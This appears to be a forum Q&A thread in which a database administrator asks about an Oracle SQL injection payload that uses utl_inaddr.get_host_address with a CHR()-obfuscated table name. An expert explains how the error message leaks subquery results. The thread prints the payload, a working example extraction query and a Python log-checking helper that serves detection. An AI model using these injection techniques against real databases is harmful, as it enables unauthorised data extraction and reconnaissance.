Solved

sql injection to select utl_inaddr.get_host_address and XS$CACHE_DELETE

Posted on 2014-01-15
1,697 Views
Last Modified: 2014-01-15
I found that someone used SQL injection to run this SQL in my Oracle database via a web application. I don't get his purpose. Why use utl_inaddr.get_host_address and the number of columns in XS$CACHE_DELETE???

select utl_inaddr.get_host_address(((
SELECT CAST (COUNT (column_name) AS CHAR (10))
  FROM all_tab_columns
 WHERE table_name =
             CHR (88)
          || CHR (83)
          || CHR (36)
          || CHR (67)
          || CHR (65)
          || CHR (67)
          || CHR (72)
          || CHR (69)
          || CHR (95)
          || CHR (68)
          || CHR (69)
          || CHR (76)
          || CHR (69)
          || CHR (84)
          || CHR (69)
))) from dual

Question by:Hoboly
7 Comments
 
LVL 74

Assisted Solution

by:sdstuber
sdstuber earned 500 total points
ID: 39784466
Do you have a table called "XS$CACHE_DELETE"  ?


The purpose of using utl_inaddr.get_host_address is a quirk of the error message returned by the function. If the host name passed in produces an error, that "name" will be returned as part of the error.

For example....

select utl_inaddr.get_host_address('something that will produce an error') from dual

ORA-29257: host something that will produce an error unknown
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^



So, by nesting a query inside the function call, the query is executed and the output of the query is taken as a host name that will likely be illegal and generate an error. Then that illegal text will be returned as part of the error message.
0
 

Author Comment

by:Hoboly
ID: 39784470
No XS$DELETE, but there is a table XS$CACHE_DELETE:

SQL> desc XS$CACHE_DELETE
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 OBJ_TYPE                                           NUMBER(2)
 NAME                                               VARCHAR2(4000)
 DEL_DATE                                  NOT NULL TIMESTAMP(6)

SQL>

It should be a standard Oracle 11g table.
0
 

Author Comment

by:Hoboly
ID: 39784471
Thanks sdstuber,
but I don't get why COUNT(column_name) goes into utl_inaddr.get_host_address.
If he wants to get the IP, he can just use utl_inaddr.get_host_address(host name) instead of utl_inaddr.get_host_address(column count).
0

 
LVL 74

Accepted Solution

by:sdstuber
sdstuber earned 500 total points
ID: 39784476
He doesn't want an ip address, he wants the query results.
That's the key to the injection.  By failing you get to see the inner query results.
Or by constructing a query that returns a numeric result that number will appear as part of an ip address even though it really isn't one.


Try this...

SELECT UTL_INADDR.get_host_address(
           'There are ' || (SELECT COUNT(*) FROM dba_tables) || ' tables in this database'
       )
  FROM DUAL;

You should get an error something like this.
The 2923 will vary based on your system.


ORA-29257: host There are 2923 tables in this database unknown



As I said above, the inner query is executed and the results are returned in the error.
0
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784483
XS$CACHE_DELETE - sorry, I posted that then saw my mistake and corrected it.

I don't know of a specific hack to utilize that table or its contents; but its mere existence would tell the hacker that XDB has been installed, and that knowledge can provide a new attack vector.
0
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784487
Actually, on further review of the initial query, the error message part probably isn't going to happen. Sorry for the confusion.

If you run the injection query you should get either

0.0.0.0    -- meaning you do not have the table, i.e. XDB is not installed
 or
0.0.0.3    -- meaning you do have the table, i.e. XDB is installed


Using the same technique, though, you can execute other queries and check the error messages to see what the results of those queries will be.
0
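As an added example (not code from this thread), here is a small Python log-triage helper for the defender's side of what sdstuber describes: it decodes the CHR() chain from the injected query in the question to reveal the table name it spells, and flags utl_inaddr calls wrapped around a subquery, which is the error-message / inference probe explained above. The sample log statements are constructed for the example.

```python
import re

# Constructed sample statements, as they might appear (one per line) in a
# web-application or Oracle audit log. The first is the injected query from
# the question; the second is an ordinary query for comparison.
SAMPLE_STATEMENTS = [
    "select utl_inaddr.get_host_address(((SELECT CAST (COUNT (column_name) AS CHAR (10)) "
    "FROM all_tab_columns WHERE table_name = CHR (88)||CHR (83)||CHR (36)||CHR (67)"
    "||CHR (65)||CHR (67)||CHR (72)||CHR (69)||CHR (95)||CHR (68)||CHR (69)||CHR (76)"
    "||CHR (69)||CHR (84)||CHR (69)))) from dual",
    "SELECT name, del_date FROM xs$cache_delete WHERE obj_type = 2",
]

CHR_ARG = re.compile(r"CHR\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
# A run of CHR(n) calls glued together with ||, e.g. CHR(88)||CHR(83)||...
CHR_CHAIN = re.compile(r"(?:CHR\s*\(\s*\d+\s*\)\s*(?:\|\|\s*)?)+", re.IGNORECASE)
MIN_CHAIN = 3  # lone CHR(10)/CHR(13) newlines are common in legitimate SQL


def decode_chr_chains(sql):
    """Return sql with every CHR() chain of MIN_CHAIN or more calls replaced
    by the quoted literal it spells; shorter chains are left untouched."""
    def repl(m):
        codes = CHR_ARG.findall(m.group(0))
        if len(codes) < MIN_CHAIN:
            return m.group(0)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHR_CHAIN.sub(repl, sql)


def analyse(sql):
    """Return a list of findings for one logged statement; empty means clean."""
    decoded = decode_chr_chains(sql)
    findings = []
    if decoded != sql:
        findings.append("CHR()-encoded literal(s); decoded statement: " + decoded)
    call = re.search(r"utl_inaddr\.\w+\s*\(", decoded, re.IGNORECASE)
    if call:
        # Everything after the call's opening parenthesis is its argument text.
        if re.search(r"\bselect\b", decoded[call.end():], re.IGNORECASE):
            findings.append("utl_inaddr called on a subquery result: "
                            "error-message / inference probe")
        else:
            findings.append("utl_inaddr network lookup issued from application SQL")
    return findings


if __name__ == "__main__":
    for stmt in SAMPLE_STATEMENTS:
        print(analyse(stmt) or ["clean"])
```

Run over a real log, the decoded literal shows which object the probe was checking for (here the XDB-related table), which is what you want in the incident record rather than the raw CHR() chain.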
 

Author Closing Comment

by:Hoboly
ID: 39784490
Excellent explanation! Thanks!
0
